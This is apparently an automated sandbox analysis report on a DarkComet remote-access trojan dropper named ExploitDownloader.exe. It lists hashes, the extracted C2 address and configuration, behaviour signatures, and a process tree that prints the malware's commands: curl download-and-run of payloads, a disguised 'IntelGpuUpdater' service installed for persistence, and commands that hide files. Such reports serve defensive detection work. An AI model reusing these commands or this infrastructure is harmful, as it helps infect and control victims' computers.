Analysis

  • max time kernel
    143s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-12-2024 20:45

General

  • Target

    ExploitDownloader.exe

  • Size

    27KB

  • MD5

    d363863c21f0d453eaaa438f00027554

  • SHA1

    7ba078266d3151068b500b9ce8cc4e579ad84a4a

  • SHA256

    12eafe77459f406a8187cb7675249dfed1b214f47eff60d1291b42ed00c576e4

  • SHA512

    1ff53e7a3f6eee3b99111a79bded3106fb809bd494b23839a5790a78f8b6baedbfaa707a16ceda481f93edde4d9b8bae06f12c444e16f7def5ce06f297f2bc37

  • SSDEEP

    384:SsuozKPc0cDxRHXLRq418p/d6tVqQ4m9lHM1UopuJE5UjovhObRZUbjMUWDBVhIB:TLLIXTEs1Urjov4RScUWD7hq7W2e0W0

Malware Config

Extracted

Family

darkcomet

Botnet

Guest16

C2

147.185.221.24:14161

Mutex

RO_MUTEX-QFYD2RJ

Attributes
  • InstallPath

    MSDCSC\msdcsc.exe

  • gencode

    scW2Kk9yHEWs

  • install

    true

  • offline_keylogger

    true

  • persistence

    false

  • reg_key

    GoogleDebugJ

Signatures

  • Darkcomet

    DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.

  • Darkcomet family
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 44 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ExploitDownloader.exe
    "C:\Users\Admin\AppData\Local\Temp\ExploitDownloader.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5020
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3980
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2772
        • C:\Windows\SysWOW64\curl.exe
          curl https://dontuseme.ct8.pl/test.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4464
        • C:\Users\Admin\AppData\Local\test.exe
          C:\Users\Admin\AppData\Local\test.exe
          4⤵
          • Modifies WinLogon for persistence
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2736
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3924
            • C:\Windows\SysWOW64\attrib.exe
              attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h
              6⤵
              • Sets file to hidden
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:3968
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3952
            • C:\Windows\SysWOW64\attrib.exe
              attrib "C:\Users\Admin\AppData\Local" +s +h
              6⤵
              • Sets file to hidden
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:5056
          • C:\Users\Admin\AppData\Local\Temp\MSDCSC\msdcsc.exe
            "C:\Users\Admin\AppData\Local\Temp\MSDCSC\msdcsc.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3064
            • C:\Windows\SysWOW64\notepad.exe
              notepad
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3932
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 232
                7⤵
                • Program crash
                PID:1544
        • C:\Windows\SysWOW64\timeout.exe
          timeout 5
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:4472
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1700
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:2784
        • C:\Windows\SysWOW64\curl.exe
          curl https://dontuseme.ct8.pl/test.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3576
        • C:\Windows\SysWOW64\curl.exe
          curl https://dontuseme.ct8.pl/nssm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4524
        • C:\Windows\IntelGpuUpdaterHelper.exe
          C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4552
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c sc start IntelGpuUpdater
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4076
          • C:\Windows\SysWOW64\sc.exe
            sc start IntelGpuUpdater
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:404
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3660
          • C:\Windows\SysWOW64\sc.exe
            sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2448
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c pause
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4400
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3932 -ip 3932
    1⤵
      PID:4360
    • C:\Windows\IntelGpuUpdaterHelper.exe
      C:\Windows\IntelGpuUpdaterHelper.exe
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:3888
      • C:\Windows\IntelGpuUpdater.exe
        "C:\Windows\IntelGpuUpdater.exe"
        2⤵
        • Modifies WinLogon for persistence
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        PID:3716
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\IntelGpuUpdater.exe" +s +h
          3⤵
          • System Location Discovery: System Language Discovery
          PID:740
          • C:\Windows\SysWOW64\attrib.exe
            attrib "C:\Windows\IntelGpuUpdater.exe" +s +h
            4⤵
            • Sets file to hidden
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:4304
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k attrib "C:\Windows" +s +h
          3⤵
          • System Location Discovery: System Language Discovery
          PID:812
          • C:\Windows\SysWOW64\attrib.exe
            attrib "C:\Windows" +s +h
            4⤵
            • Sets file to hidden
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:400
        • C:\Windows\TEMP\MSDCSC\msdcsc.exe
          "C:\Windows\TEMP\MSDCSC\msdcsc.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          • Suspicious use of SetWindowsHookEx
          PID:4172
          • C:\Windows\notepad.exe
            notepad
            4⤵
            • Modifies data under HKEY_USERS
            PID:4896
      • C:\Windows\IntelGpuUpdater.exe
        "C:\Windows\IntelGpuUpdater.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        • Suspicious use of SetWindowsHookEx
        PID:396
        • C:\Windows\notepad.exe
          notepad
          3⤵
            PID:2316

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\test.exe

        Filesize

        251KB

        MD5

        59a062d42753c520fa5531b312edafbd

        SHA1

        cccbea6327b6fb94c3874981531074edea20c776

        SHA256

        d616881a05c6d49f93d5a1997bd98c13991c1cc8ee2c3a2c05749ce12288cc8e

        SHA512

        5f9a9db8672d89880535c5e5d8f50f0a3b750c246ef900cbaffd9e29abd90c8c84832c269bbf6923c27526432ce3997fd3457e2b691f31eef356f65eec669032

      • C:\Windows\IntelGpuUpdaterHelper.exe

        Filesize

        256KB

        MD5

        c721739bd54dd9beb16909f6807b73c5

        SHA1

        5ec54658246914144293357f302e68bf9972fb71

        SHA256

        7376ce1eefd786d30efbecb716a13e9d23d27cfc362ce1bbc2fbebdf4fbf54ea

        SHA512

        0800c5f0425237219d7d34654cc021b8b8aa1fce1545ba9815c7be12a623edb08a098fd4de40ccc867487639647cb7f316316464a3a0bdb0650fdd2852408b4e

      • memory/396-94-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/396-112-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/396-110-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/2736-3-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/2736-5-0x0000000002400000-0x0000000002401000-memory.dmp

        Filesize

        4KB

      • memory/2736-42-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/3064-111-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/3064-92-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/3716-53-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/3716-88-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB

      • memory/3932-40-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

        Filesize

        4KB

      • memory/4172-90-0x0000000000400000-0x00000000004B7000-memory.dmp

        Filesize

        732KB